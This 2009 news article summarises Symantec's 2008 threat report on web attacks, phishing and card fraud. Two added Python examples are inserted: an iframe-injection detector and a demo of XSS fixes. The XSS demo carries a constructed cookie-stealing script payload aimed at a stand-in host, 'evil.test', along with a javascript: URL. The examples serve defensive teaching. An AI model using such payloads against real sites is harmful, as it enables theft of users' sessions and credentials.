Sunday, May 03, 2009

Phishers in cyber waters on the rise

By Deepa Damodaran

Halloween spam, 'Obama beat McCain' spam, 'Will you be my Spamentine', and the recent Conficker spam: the web has never been short of malicious activity. The nature of the attacks, however, is clearly evolving.

In an age where everything from bill payment to banking has gone mobile and is carried over the net, computer-based attacks are giving way to web-based attacks. In a web-based attack, users are targeted when they visit legitimate websites that attackers have compromised in order to serve malicious content.

Attackers are thus on the prowl for Internet users, who are plentiful online and provide them with an array of targets and means to carry out their activities.

Symantec's 'Global Internet Security Threat Report: Trends for 2008' says that in 2008 alone 12,885 site-specific vulnerabilities were identified, and that 63 per cent of all vulnerabilities documented in the year affected web applications.

The targets of attack have evolved, and so have the methods and the hands behind them. Web-based threats have become not only widespread but also sophisticated. Unlike in earlier years, the online underground economy today is consolidated and mature enough to adapt its activities rapidly.

Eight of the top ten vulnerabilities exploited in 2008 were rated medium severity. This shows that attackers are gradually adopting lengthy, multi-step attack chains instead of relying on single high-severity flaws.

While a single high-severity flaw can be exploited to fully compromise a user, attackers are now frequently stringing together multiple exploits for medium-severity vulnerabilities to achieve the same goal.

Symantec's report, released in April, notes that some of the common techniques used by attackers to compromise a website include exploiting a vulnerable web application running on the server (by attacking through improperly secured input fields), or exploiting some vulnerability present in the underlying host operating system.

Attackers can exploit these vulnerabilities in a website or underlying application to modify the pages served to users visiting the site. This can include directly serving malicious content from the site itself, or embedding a malicious iframe on pages that can redirect a user’s browser to another web server that is under the attacker’s control. In this way, the compromise of a single website can cause attacks to be launched against every visitor to that site.
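The injected-iframe technique described above can be spotted from the served HTML itself. The following is an added example, not code from the report or the article: it collects every iframe on a page and flags those with the traits the text describes (a destination outside the site's own host, a one-pixel or hidden frame). The sample page, the hostnames and the heuristics are constructed for illustration.

```python
"""Flag iframes that look injected into a compromised page.

Added example (not from Symantec's report or this article). Each <iframe> is
checked for an external src, a 0/1-pixel size, or CSS that hides it.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS tricks commonly used to keep an injected frame out of sight (assumed list)
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}", re.I
)


class IframeCollector(HTMLParser):
    """Gathers the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for a width/height of 0 or 1, a classic way to hide an injected frame."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


def suspicious_iframes(html, site_host):
    """Return a list of (src, reasons) for each iframe that looks injected.

    site_host is the hostname the page legitimately belongs to; frames that
    point at it or one of its subdomains are not treated as external.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        reasons = []
        host = urlparse(src).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.append("external src " + host)
        if _tiny(frame.get("width")) or _tiny(frame.get("height")):
            reasons.append("zero/one pixel size")
        if HIDDEN_STYLE.search(frame.get("style", "")):
            reasons.append("hidden by CSS")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: one legitimate embed plus an injected hidden frame.
SAMPLE_PAGE = """<html><body>
<h1>Example Bank</h1>
<iframe src="https://www.example-bank.test/rates" width="600" height="400"></iframe>
<p>Welcome back.</p>
<iframe src="http://malicious.example.test/exploit.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_PAGE, "www.example-bank.test"):
        print(src, "->", ", ".join(why))
```

Run over the sample page, only the second frame is reported, with all three reasons. In practice the same check is run against the HTML as a visitor receives it (not the files on disk), since injected content is often added by a compromised server-side template or a modified web server rather than by editing the page files.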

The lengthy and complicated steps pursued to launch successful web-based attacks demonstrate the increasing complexity of methods used by attackers.

Severe vulnerabilities are, naturally, dealt with on a war footing, whereas medium- and low-severity ones are taken for granted. But what if the severity is low and the damage is mass? Here lies the hole.

Users often make patching high-severity vulnerabilities a top priority, while medium- and low-severity vulnerabilities may be ignored. The result is that more computers can remain exposed to these vulnerabilities for longer periods.

For example, of the 12,885 site-specific cross-site scripting vulnerabilities identified by Symantec in 2008, only 394 (around three per cent) are known to be fixed.
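The site-specific cross-site scripting flaws counted above are, in most cases, the 'improperly secured input fields' mentioned earlier. As an added example, not taken from the report or the article, here is the vulnerable pattern beside a hardened version; the page fragments and payloads are constructed for illustration.

```python
"""Reflected XSS through an unescaped input field, beside a hardened version.

Added example (not from Symantec's report or this article). The vulnerable
function echoes user input straight into the page; the hardened ones encode
the value for the HTML context it lands in, and check the URL scheme where
encoding alone is not enough.
"""
from html import escape
from urllib.parse import urlparse


def render_search_vulnerable(query):
    """Echoes the query directly into the page body: a classic site-specific XSS."""
    return "<p>Results for: " + query + "</p>"


def render_search_hardened(query):
    """Same page, with the value HTML-encoded (quotes included) before insertion."""
    return "<p>Results for: " + escape(query, quote=True) + "</p>"


def render_link_hardened(url, label):
    """Attribute context: a javascript: URL survives HTML encoding untouched,
    so the scheme is checked first, then both values are encoded."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">%s</a>' % (escape(url, quote=True), escape(label, quote=True))


# Constructed payloads: a cookie-stealing script and a javascript: link
PAYLOAD_TAG = '<script>document.location="http://evil.test/?c="+document.cookie</script>'
PAYLOAD_URL = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD_TAG))
    print(render_search_hardened(PAYLOAD_TAG))
    print(render_link_hardened(PAYLOAD_URL, "click"))
```

The second function neutralizes the script tag, but note the third: escaping the javascript: URL would have left it fully functional inside the href attribute, which is why the fix depends on where in the page the input ends up, not just on whether it is encoded.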

Medium-severity vulnerabilities affecting client or desktop applications are often sufficient for an attacker to mount successful attacks on individual end users as well as on enterprises.

Symantec expects malicious activity to shift to regions with emerging Internet infrastructures. Emerging economies are today looking for ways to push broadband penetration. Broadband will be a crucial factor, and it will bring both the benefits of connectivity and a rise in malicious activity if not handled properly.

Malicious activity usually affects computers connected to high-speed broadband Internet, because these connections are attractive targets for attackers: they offer larger bandwidth than other connection types, faster speeds, the potential for constantly connected systems, and typically more stable connections.

Such connections appeal to attackers as potential bases for hosting phishing websites, spam relays and other malicious content. No wonder developed nations (China, the USA and Germany) top the list of spam generators.

The report finds that, more than ever before, attackers are concentrating on compromising end users for financial gain. In 2008, 78 per cent of threats to confidential information exported user data, and 76 per cent used a keystroke-logging component to steal information such as online banking credentials.

Additionally, 76 per cent of phishing lures targeted brands in the financial services sector, and this sector also had the most identities exposed through data breaches. Similarly, 12 per cent of all data breaches in 2008 exposed credit card information.

This is likely because there are numerous ways for credit card information to be stolen, and because stolen card data can easily be cashed out: the underground economy has a well-established infrastructure for monetizing such information, including specialists who manufacture blank plastic cards with magnetic stripes, destined to be encoded with stolen credit card and bank card data.

Symantec expects overt attack activities to be either abandoned or pushed further underground. If the effort of setting up a malicious ISP outweighs the return attackers can extract before it is taken offline, they are likely to abandon this approach for other attack vectors in order to continue evading detection and potential apprehension or prosecution.

Changes in the threat landscape, such as the increasing complexity and sophistication of attacks and the evolution of attackers and attack patterns, point to a trend which, if not dealt with promptly, will put the emerging world's security at risk.

With malicious code developers growing ever more adaptable and better at evading detection, it has become all the more important for emerging economies to be on their toes, since they lack the resources to combat the growing involvement of organized crime in the online underground economy.
